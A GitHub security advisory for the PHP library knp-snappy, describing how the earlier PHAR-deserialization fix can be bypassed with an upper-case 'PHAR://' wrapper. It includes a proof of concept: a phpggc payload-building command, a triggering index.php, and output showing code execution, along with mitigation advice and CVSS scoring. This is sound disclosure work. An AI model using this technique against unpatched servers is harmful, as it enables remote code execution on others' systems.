Skip to content

PHAR deserialization (CVE-2023-28115 patch bypass)

Critical
alexpozzi published GHSA-92rv-4j2h-8mjj Sep 6, 2023

Package

composer knplabs/knp-snappy (Composer)

Affected versions

<= 1.4.2

Patched versions

>= 1.4.3

Description

Issue

On March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. To fix this issue, the version 1.4.2 was released with an additional check in the affected function to prevent the usage of the phar:// wrapper. However, because PHP wrappers are case-insensitive and the patch only checks the presence of the phar:// string, it can be bypassed to achieve remote code execution again using a different case.

As for the initial vulnerability, PHP 7 or below is required for a successful exploitation using the deserialization of PHP archives metadata via the phar:// wrapper.

Technical details

Description

The following patch was committed on the 1.4.2 release to fix CVE-2023-28115.

patch

If the user is able to control the second parameter of the generateFromHtml() function of Snappy, it will then be passed as the $filename parameter in the prepareOutput() function. In the original vulnerability, a file name with a phar:// wrapper could be sent to the fileExists() function, equivalent to the file_exists() PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files.

To fix this issue, the string is now passed to the strpos() function and if it starts with phar://, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using PHAR:// instead of phar://.

Proof of Concept

To illustrate the vulnerability, the /tmp/exploit file will be written to the filesystem using a voluntarily added library to trigger the deserialization. The PHP archive is generated using phpggc with the -f option to force a fast destruct on the object. Otherwise, the PHP flow will stop on the first exception and the object destruction will not be called.

$ phpggc -f Monolog/RCE1 exec 'touch /tmp/exploit' -p phar -o exploit.phar

The following index.php file will be used to trigger the vulnerability via the payload PHAR://exploit.phar.

<?php
// index.php

// include autoloader
require __DIR__ . '/vendor/autoload.php';

// reference the snappy namespace
use Knp\Snappy\Pdf;

$snappy = new Pdf('/usr/local/bin/wkhtmltopdf');
$snappy->generateFromHtml('<h1>POC</h1>', 'PHAR://exploit.phar');

Finally once executed, the /tmp/exploit file is successfully created on the filesystem.

$ php index.php 
Fatal error: Uncaught InvalidArgumentException: The output file 'PHAR://exploit.phar' already exists and it is a directory. in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php:634
Stack trace:
#0 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(178): Knp\Snappy\AbstractGenerator->prepareOutput('PHAR://exploit.phar', false)
#1 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/Pdf.php(36): Knp\Snappy\AbstractGenerator->generate(Array, 'PHAR://exploit.phar', Array, false)
#2 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(232): Knp\Snappy\Pdf->generate(Array, 'PHAR://exploit.phar', Array, false)
#3 /var/www/index.php(12): Knp\Snappy\AbstractGenerator->generateFromHtml('<h1>POC</h1>', 'PHAR://exploit.phar')
#4 {main}
  thrown in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php on line 634
  
$ ls -l /tmp/exploit
-rw-r--r-- 1 user_exploit user_exploit 0 Jun 14 10:05 exploit

This proof of concept is based on the original one published with CVE-2023-28115.

Impact

A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8.

Patches

Synacktiv recommends to use a whitelist instead of a blacklist. In this situation, only the wrappers http://, https:// or file:// be available on the function generateFromHtml().

Workarounds

Control user data submitted to the function AbstractGenerator->generate(...)

References

GHSA-gq6w-q6wh-jggc

Credits

Rémi Matasse of Synacktiv (https://synacktiv.com/).

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID

CVE-2023-41330

Weaknesses